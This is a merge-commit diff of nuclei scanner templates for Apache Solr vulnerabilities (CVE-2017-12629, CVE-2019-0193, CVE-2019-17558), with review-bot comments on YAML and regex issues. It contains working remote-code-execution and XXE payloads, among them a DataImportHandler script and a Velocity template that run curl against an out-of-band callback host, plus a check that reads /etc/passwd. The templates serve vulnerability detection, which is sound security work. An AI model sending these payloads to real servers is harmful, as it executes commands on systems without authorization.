Merge pull request #2357 from projectdiscovery/solr-fixes

Added CVE-2019-0193 and a few fixes
patch-1
Sandeep Singh 2021-08-09 22:02:56 +05:30 committed by GitHub
commit 99f71a941c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
6 changed files with 99 additions and 42 deletions


@ -1,26 +1,36 @@
id: CVE-2017-12629
info:
name: Apache Solr <= 7.1 Remote Code Execution via SSRF
name: Apache Solr <= 7.1 XML entity injection
author: dwisiswant0
severity: critical
tags: cve,cve2017,solr,apache,rce,ssrf,oob
tags: cve,cve2017,solr,apache,oob,xxe
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- https://twitter.com/honoki/status/1298636315613974532/photo/1
- https://twitter.com/honoki/status/1298636315613974532
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
requests:
- raw:
- |
GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}}
- |
GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "dns"
- "http"
extractors:
- type: regex
internal: true
name: core
group: 1
regex:
- '"name"\:"(.*?)"'
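Review bot: The two vulhub URLs added under `reference: |` land inside a literal block scalar, so the whole reference list (including the pre-existing NVD and Twitter entries) is one multi-line string rather than a YAML sequence, and the leading `- ` stays in the value; nuclei may tolerate a string here, but it is not what the indentation suggests. Drop the `|` and make them list items: `reference:` followed by `  - https://nvd.nist.gov/vuln/detail/CVE-2017-12629` and the other three at the same indent. Separately, the second request depends on `{{core}}` from the extractor but nothing asserts that the cores listing actually yielded a name; if the extractor matches nothing the request is presumably sent with a blank core, so the `interactsh_protocol` matcher alone is what keeps this from false positives, which is worth a comment above `extractors:`.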


@ -0,0 +1,47 @@
id: CVE-2019-0193
info:
name: Apache Solr - DataImportHandler RCE
description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
author: pdteam
severity: critical
refrense: |
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
- https://paper.seebug.org/1009/
tags: cve,cve2019,apache,rce,solr,oob
requests:
- raw:
- |
GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close
- |
POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1
Host: {{Hostname}}
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
extractors:
- type: regex
internal: true
name: core
group: 1
regex:
- '"name"\:"(.*?)"'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200
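Review bot: `refrense:` in the info block is a misspelled key, so the three URLs beneath it are not attached to the template's `reference` field; rename it to `reference:` and write the entries as a list rather than a `|` block scalar, e.g. `reference:` / `  - https://nvd.nist.gov/vuln/detail/CVE-2019-0193`. The same misspelling sits on the context line above the changed `tags` in the CVE-2019-17558 section of this commit. In the POST body, `core=test` is hard-coded while the request path uses the extracted `{{core}}`; if the handler honours the `core` form field the two could disagree, so either use `{{core}}` there as well or drop the field. The single-line `description:` would also be easier to read and lint as a `>-` folded scalar.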


@ -4,7 +4,7 @@ info:
author: pikpikcu,madrobot
severity: critical
refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
tags: cve,cve2019,apache,rce,solr
tags: cve,cve2019,apache,rce,solr,oob
requests:
- raw:
@ -15,15 +15,10 @@ requests:
Connection: close
- |
POST /solr/{{collection}}/config HTTP/1.1
POST /solr/{{core}}/config HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Content-Type: application/json
Content-Length: 259
Upgrade-Insecure-Requests: 1
{
"update-queryresponsewriter": {
@ -37,25 +32,25 @@ requests:
}
- |
GET /solr/{{collection}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nslookup%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200
extractors:
- type: regex
regex:
- '"status"\:\{"(.*?)"\:\{"name"'
name: collection
group: 1
internal: true
matchers:
- type: word
words:
- "Non-authoritative answer"
- "example.com"
condition: and
name: core
group: 1
regex:
- '"name"\:"(.*?)"'
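Review bot: The replacement extractor `'"name"\:"(.*?)"'` captures the first `"name"` value anywhere in the `/solr/admin/cores?wt=json` response, whereas the pattern it replaces anchored the capture under `"status":{...:{"name"`; if that response ever carries another `"name"` key earlier in the document (for example under `initFailures`), `{{core}}` would be populated with the wrong value and the follow-up request would go to a non-existent core. I would keep an anchored form, e.g. `- '"status"\:\{"(.*?)"\:\{"name"'`, and note that the `\:` escapes are unnecessary in either pattern. The same swap appears in the two sections below that reorder the extractor, and the unanchored form is also used in the CVE-2017-12629 and CVE-2019-0193 templates above, so one decision should apply to all of them.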


@ -26,13 +26,14 @@ requests:
Accept-Language: en
Connection: close
extractors:
- type: regex
regex:
- '"status"\:\{"(.*?)"\:\{"name"'
internal: true
name: core
group: 1
internal: true
regex:
- '"name"\:"(.*?)"'
matchers:
- type: word


@ -18,6 +18,7 @@ requests:
- type: word
words:
- '<title>Solr admin page</title>'
- type: status
status:
- 200
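Review bot: The new `status` matcher is appended to an existing `word` matcher, but the `matchers:` key and any `matchers-condition` sit above the hunk, outside the view; if no `matchers-condition: and` is set there, nuclei combines matchers with OR by default and any 200 response would satisfy the template on its own, turning a title check into a false-positive generator. The CVE-2019-0193 and CVE-2019-17558 sections in this same commit add `matchers-condition: and` alongside the status matcher, so this file should do the same: `matchers-condition: and` placed immediately before `matchers:`.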


@ -24,18 +24,21 @@ requests:
Accept-Language: en
Connection: close
extractors:
- type: regex
regex:
- '"status"\:\{"(.*?)"\:\{"name"'
internal: true
name: core
group: 1
internal: true
regex:
- '"name"\:"(.*?)"'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'regex("root:.*:0:0:", body_2)'
condition: and
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"